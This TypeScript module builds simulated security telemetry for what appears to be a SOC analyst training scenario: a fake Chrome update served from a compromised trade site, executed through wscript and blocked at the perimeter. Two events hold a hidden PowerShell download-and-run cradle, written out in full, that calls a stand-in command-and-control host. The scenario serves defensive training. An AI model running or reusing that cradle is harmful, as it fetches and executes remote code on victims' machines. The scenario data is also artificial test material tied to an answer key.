/**
 * Events-only half of the ./fakeBrowserUpdate.ts scenario pack.
 *
 * The dashboard's live feed runs in the browser (attackStories.ts), so what it
 * imports ships in a public /_next/static chunk. The answer key (questions,
 * answers, explanations, IOCs, killchain, narrative) stays in the builder in
 * ./fakeBrowserUpdate.ts, which composes this module on the server. Keep anything
 * answer-bearing out of this file: every visitor can read it.
 */
import type { TelemetryEvent } from "@/lib/sim/types";
import { makeSha256 } from "@/lib/sim/iocs";
import { csFile, csProcess, csDetection } from "@/lib/sim/emitters/crowdstrike";
import { panWeb } from "@/lib/sim/emitters/paloalto";

/** Telemetry half of `buildFakeBrowserUpdateScenario`: the events and the story title, no answer key. */
export function fakeBrowserUpdateScenarioEvents() {
  const B = new Date("2026-06-18T13:42:00Z").getTime();
  const T = (ms: number) => new Date(B + ms).toISOString();
  const MIN = 60_000;

  const host = { hostname: "LAP-4471", ip: "10.14.22.108" };
  const victim = { email: "d.rosen@nexacorp.com", name: "Dana Rosen", sam: "d.rosen" };

  // The compromised site is genuine and categorised as business/news — this is
  // the entire point of the scenario.
  const compromisedSite = "logisticsweekly.com";
  const stagingHost = "cdn-static-assets-92.net";
  const c2 = "api-telemetry-sync.com";

  const scriptHash = makeSha256("fake_chrome_update_jscript_dropper_2026");
  const wscriptHash = makeSha256("windows_system32_wscript_exe_signed_microsoft");
  const powershellHash = makeSha256("windows_powershell_v1_signed_microsoft");

  // EDR↔scenario integration (Phase 4): one incident, endpoint-primary →
  // edr_scope "edr". Alert-grade rows: the Falcon script-dropper detection that
  // opens the ticket, plus the wscript user-execution behavioural event (the
  // crux — the technique the alert names). The rest is pivot-only telemetry.
  const INCIDENT = "inc:fbu:1";

  // Shared emitter context — one NexaCorp laptop, CrowdStrike + Palo Alto.
  const cs = { companyId: "nexacorp", host: host.hostname, user: victim.email, srcIp: host.ip };

  const events: TelemetryEvent[] = [
    // ---------------------------------------------------------------------
    // 1-8. The drive-by chain — CrowdStrike + Palo Alto, generated by the typed
    //      emitters. Host, user (NEXACORP\d.rosen), PIDs and hashes thread
    //      consistently; every raw block uses only registry-valid vendor fields.
    // ---------------------------------------------------------------------

    // 1. Ordinary browsing on the (compromised) trade publication.
    {
      ...panWeb({
      ...cs, id: "evt_fbu_01_site_visit", ts: T(0), severity: "low",
      url: `https://${compromisedSite}/2026/06/port-congestion-outlook`, domain: compromisedSite,
      category: "business-and-economy", action: "alert", dstIp: "185.199.108.153", status: 200, bytesIn: 148_320,
      userAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/126.0.0.0 Safari/537.36",
      userTitle: "Logistics Coordinator",
      description: "LAP-4471 loaded an article page on logisticsweekly.com, allowed under the category business-and-economy.",
      }),
      // A real employee reading a real trade publication — the legitimate first step
      // of the story (the attack begins at the hand-off in evt_fbu_02).
      is_baseline: true,
    },

    // 2. The injected overlay pulls its payload from an unrelated host.
    panWeb({
      ...cs, id: "evt_fbu_02_overlay_fetch", ts: T(1 * MIN + 12_000), severity: "low",
      url: `https://${stagingHost}/loader/update-check.js`, domain: stagingHost,
      category: "computer-and-internet-info", action: "alert", dstIp: "91.219.238.14", status: 200, bytesIn: 12_744,
      referer: `https://${compromisedSite}/2026/06/port-congestion-outlook`, mitre: "T1189", tactic: "Initial Access",
      description: "During the same page view, the browser session requested /loader/update-check.js from cdn-static-assets-92.net, referred by the logisticsweekly.com article.",
    }),

    // 3. The user downloads the "update" — a JScript file.
    panWeb({
      ...cs, id: "evt_fbu_03_download", ts: T(3 * MIN + 40_000), severity: "medium",
      url: `https://${stagingHost}/download/Chrome_Update_127.0.6533.js`, domain: stagingHost,
      category: "computer-and-internet-info", action: "alert", dstIp: "91.219.238.14", status: 200, bytesIn: 341_902,
      file: { name: "Chrome_Update_127.0.6533.js", path: "/download/Chrome_Update_127.0.6533.js", sha256: scriptHash, size: 341_902 },
      fileType: "script", mitre: "T1189", tactic: "Initial Access",
      description: "The same host then downloaded Chrome_Update_127.0.6533.js from cdn-static-assets-92.net over the same session.",
    }),

    // 4. The file is written to disk (by chrome.exe).
    csFile({
      ...cs, id: "evt_fbu_04_file_write", ts: T(3 * MIN + 44_000),
      path: "C:\\Users\\d.rosen\\Downloads\\Chrome_Update_127.0.6533.js", sha256: scriptHash, severity: "low",
      description: "chrome.exe wrote C:\\Users\\d.rosen\\Downloads\\Chrome_Update_127.0.6533.js to disk.",
    }),

    // 5. THE CRUX — the user double-clicks: explorer -> wscript with the .js as its arg.
    csProcess({
      ...cs, id: "evt_fbu_05_wscript", ts: T(5 * MIN + 8_000),
      processName: "wscript.exe", pid: 9312, processPath: "C:\\Windows\\System32\\wscript.exe",
      cmdline: 'wscript.exe "C:\\Users\\d.rosen\\Downloads\\Chrome_Update_127.0.6533.js"',
      parentName: "explorer.exe", parentPid: 3560, sha256: wscriptHash, signed: true,
      mitre: "T1204.002", tactic: "Execution", severity: "high", isDetection: true,
      description: "explorer.exe started wscript.exe with the downloaded .js file as its argument.",
    }),

    // 6. wscript spawns hidden PowerShell with a download-and-run command.
    csProcess({
      ...cs, id: "evt_fbu_06_powershell", ts: T(5 * MIN + 11_000),
      processName: "powershell.exe", pid: 9388, processPath: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      cmdline: "powershell.exe -w hidden -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('https://api-telemetry-sync.com/s/2')\"",
      parentName: "wscript.exe", parentPid: 9312, sha256: powershellHash, signed: true,
      mitre: "T1059.001", tactic: "Execution", severity: "critical", isDetection: true,
      description: "wscript.exe spawned powershell.exe with a download-and-run command line pointing at api-telemetry-sync.com.",
    }),

    // 7. The second-stage fetch is refused at the perimeter (block-url).
    panWeb({
      ...cs, id: "evt_fbu_07_c2_blocked", ts: T(5 * MIN + 12_000), severity: "high",
      url: `https://${c2}/s/2`, domain: c2, category: "newly-registered-domain", action: "block",
      dstIp: "45.61.136.90", status: 0, mitre: "T1105", tactic: "Command and Control",
      description: "The outbound request to api-telemetry-sync.com/s/2 was denied under the category newly-registered-domain.",
    }),

    // 8. The Falcon detection that opens the ticket (killed the PowerShell).
    {
      ...csDetection({
        ...cs, id: "evt_fbu_08_edr_alert", ts: T(5 * MIN + 30_000), eventType: "edr_alert",
        processName: "powershell.exe", pid: 9388, parentPid: 9312,
        processPath: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        cmdline: "powershell.exe -w hidden -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('https://api-telemetry-sync.com/s/2')\"",
        sha256: powershellHash, threatName: "Suspicious PowerShell download cradle launched by a script host",
        action: "killed", expectedVerdict: "tp", mitre: "T1204.002", tactic: "Execution",
        technique: "User Execution: Malicious File", severity: "critical",
        description: "Falcon raised a Critical detection on LAP-4471 for the explorer → wscript → powershell chain and killed the PowerShell process.",
      }),
      edr_scope: "edr",
    },
  ];

  // Every event belongs to the one incident.
  for (const e of events) e.incident_id = INCIDENT;

  return { title: "Fake Browser Update — Drive-by on a Trusted Site", events, T, MIN, host, compromisedSite, stagingHost, c2, scriptHash };
}
